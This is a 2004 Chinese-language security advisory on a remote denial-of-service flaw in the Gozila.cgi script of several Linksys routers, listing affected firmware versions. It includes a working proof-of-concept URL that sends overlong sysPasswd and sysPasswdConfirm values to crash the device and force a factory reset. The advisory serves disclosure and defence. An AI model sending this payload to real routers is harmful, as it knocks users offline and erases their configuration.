首页 -> 安全研究

安全研究

安全漏洞
多种Linksys路由器Gozila.cgi远程拒绝服务漏洞

发布日期:2004-06-03
更新日期:2004-06-08

受影响系统:
Linksys EtherFast BEFSR41 Router 1.44
Linksys EtherFast BEFSR41 Router 1.43.3
Linksys EtherFast BEFSR41 Router 1.43
Linksys EtherFast BEFSR41 Router 1.42.7
Linksys EtherFast BEFSR41 Router 1.42.3
Linksys EtherFast BEFSR41 Router 1.41
Linksys EtherFast BEFSR41 Router 1.40.2
Linksys EtherFast BEFSR41 Router 1.39
Linksys EtherFast BEFSR41 Router 1.38
Linksys EtherFast BEFSR41 Router 1.37
Linksys EtherFast BEFSR41 Router 1.36
Linksys EtherFast BEFSR41 Router 1.35
Linksys EtherFast BEFSR11 Router 1.44
Linksys EtherFast BEFSR11 Router 1.43.3
Linksys EtherFast BEFSR11 Router 1.43
Linksys EtherFast BEFSR11 Router 1.42.7
Linksys EtherFast BEFSR11 Router 1.42.3
Linksys EtherFast BEFSR11 Router 1.41
Linksys EtherFast BEFSR11 Router 1.40.2
Linksys EtherFast BEFSRU31 Router 1.44
Linksys EtherFast BEFSRU31 Router 1.43.3
Linksys EtherFast BEFSRU31 Router 1.43
Linksys EtherFast BEFSRU31 Router 1.42.7
Linksys EtherFast BEFSRU31 Router 1.42.3
Linksys EtherFast BEFSRU31 Router 1.41
Linksys EtherFast BEFSRU31 Router 1.40.2
Linksys BEFSX41 1.45.3
Linksys BEFSX41 1.44.3
Linksys BEFSX41 1.44
Linksys BEFSX41 1.43.4
Linksys BEFSX41 1.43.3
Linksys BEFSX41 1.43
Linksys BEFSX41 1.42.7
描述:
BUGTRAQ  ID: 10453

Linksys拥有多种网络设备产品线。

多种Linksys路由器包含的Gozila.cgi脚本未能正确处理用户提交的参数,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。

如果提交2条超长字符串给Gozila.cgi脚本的sysPasswd和sysPasswdConfirm参数,会导致路由器丢弃所有当前连接,需要使用reset按钮来恢复出厂设置。

攻击者可以构建WEB页或发送恶意HTML形式EMAIL给目标用户。

<*来源:b0f (b0fnet@yahoo.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108627549419020&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

b0f (b0fnet@yahoo.com)提供了如下测试方法:

http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA&UPnP_Work=1&FactoryDefaults=0

建议:
厂商补丁:

Linksys
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.linksys.com

浏览次数:2884
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障